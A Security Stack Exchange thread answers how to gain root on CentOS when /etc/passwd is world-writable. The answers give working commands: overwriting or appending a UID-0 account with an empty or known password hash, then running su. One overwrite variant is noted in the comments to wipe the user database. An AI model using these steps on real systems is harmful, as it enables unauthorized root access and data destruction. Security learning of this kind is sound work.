11

If I have a world writeable /etc/passwd file on a system, how can I escalate my privileges to root? I am currently a underprivileged user. The underlying OS is CentOS 7.2 in case you are wondering

I know that passwd file is not normally world writeable, I am doing a challenge that has the current scenario.

Any steps to exploitation will be greatly helpful

Airbourne
  • 271
  • 2
  • 7
  • 17
  • 1
    I recommend that you take a closer look at what the columns in the passwd file means, i.e. if there is a difference between root and non-privileged user and what this difference means. – Steffen Ullrich Feb 19 '17 at 11:20

4 Answers4

23

Passwords are normally stored in /etc/shadow, which is not readable by users. However, historically, they were stored in the world-readable file /etc/passwd along with all account information. For backward compatibility, if a password hash is present in the second column in /etc/passwd, it takes precedence over the one in /etc/shadow.

Historically, an empty second field in /etc/passwd means that the account has no password, i.e. anybody can log in without a password (used for guest accounts). This is sometimes disabled. If passwordless accounts are disabled, you can put the hash of a password of your choice. You can use the crypt function to generate password hashes, for example perl -le 'print crypt("foo", "aa")' to set the password to foo.

It's possible to gain root access even if you can only append to /etc/passwd and not overwrite the contents. That's because it's possible to have multiple entries for the same user, as long as they have different names — users are identified by their ID, not by their name, and the defining feature of the root account is not its name but the fact that it has user ID 0. So you can create an alternate root account by appending a line that declares an account with another name, a password of your choice and user ID 0.

Gilles 'SO- stop being evil'
  • 50,912
  • 13
  • 120
  • 179
  • Hi @Gilles, do you know if the same hashing algorithm is used to store password hashes in /etc/passwd and /etc/shadow? From my understanding, crypt is used for /etc/shadow, while some other algorithm is used for /etc/passwd? – Shuzheng May 03 '19 at 07:42
  • @Shuzheng There's no difference between `/etc/passwd` and `/etc/shaddow`. Both use the `crypt` function. The `crypt` function supports multiple algorithms, it chooses based on the salt that you pass to it. – Gilles 'SO- stop being evil' May 03 '19 at 08:20
  • if the crypt function supports multiple algorithms, how does a password verifier knows which algorithm was used to compute the hash? Also, if the crypt function was to be extended, it would break things? – Shuzheng May 03 '19 at 09:19
  • @Shuzheng The hash starts with some characters that indicate the algorithm. Check the `crypt(3)` man page, e.g. [on Linux](http://man7.org/linux/man-pages/man3/crypt.3.html). – Gilles 'SO- stop being evil' May 03 '19 at 09:51
12

Just type:

echo root::0:0:root:/root:/bin/bash > /etc/passwd

su

and you are root.

(Removing x means root requires no password anymore, you can use sed command instead of echo yet this is enough to get root shell)

schroeder
  • 123,438
  • 55
  • 284
  • 319
  • 5
    Doing this constitutes an instant DoS attack against the server in question, because it overwrites the entire user database so that all the accounts other than your new root no longer exist. You probably want to use ">> /etc/passwd" rather than "> /etc/passwd". Also, any Unix administrator worthy of the title will never allow world write to the /etc/passwd file. – Mike McManus Sep 28 '17 at 21:28
  • 4
    Just an update with acknowledgement from practical side. Machine tested: Ubuntu 16.04.3, Kernel 4.13.0-36 > $ echo "toor::0:0:toor:/root:/bin/bash" >> /etc/passwd This doesn't works on actual Linuxes anymore. Empty password leads to "Authentication failure". > $ perl -le 'print crypt("foo", "aa")'
    > aaKNIEDOaueR6
    > $ echo "toor1:aaKNIEDOaueR6:0:0:toor:/root:/bin/bash" >> /etc/passwd This works. Credentials "toor1/foo" are accepted, providing root shell (In real pentest though I would use more complex pass in case if system has password policy in place).
    – dtrizna Jun 01 '18 at 05:54
  • 1
    @MikeMcManus The server doesn't necessarily intend to make it writable. Shortly after "dirtycow" was disclosed, I used it to get root on a system by overwriting the `/etc/passwd` file (after accidentally corrupting it some and almost bringing the whole system down...). – forest Jun 01 '18 at 13:35
3

You can use this non-destructive method:

# to generate hash of the password
openssl passwd mrcake
hKLD3431415ZE

# to create a second root user with "mrcake" password
echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd

# to switch to a root2
su root2
Password: mrcake 
mr guest
  • 31
  • 1
  • Your answer is a bit wrong, since your generated hash doesn't match the one inserted for `root`. I guess, you accidentally noticed that you need to include username as password salt. – Shuzheng May 03 '19 at 07:25
  • 1
    @Shuzheng mr guest is not wrong, if you run the command he suggested openssl passwd mrcake with no username or salt, you get a different hash every time. If you take your generated hash from that command, with no username or salt, and substitute in the command to add the new user to the passwd file, echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd then try to su that user with the password used to generate the hash you used, it works. – John Lally Jul 01 '20 at 15:36
  • @JohnLally - how would Linux be able to verify the password, if a different hash is generated each time? – Shuzheng Jul 02 '20 at 17:25
1

You can redirect the root shell to a program in your home. Such program is run as root, and in such program you can get you privileges (e.g. by setting setuid), or just do what do you want. Considering that various process will run root shells, you get quickly root.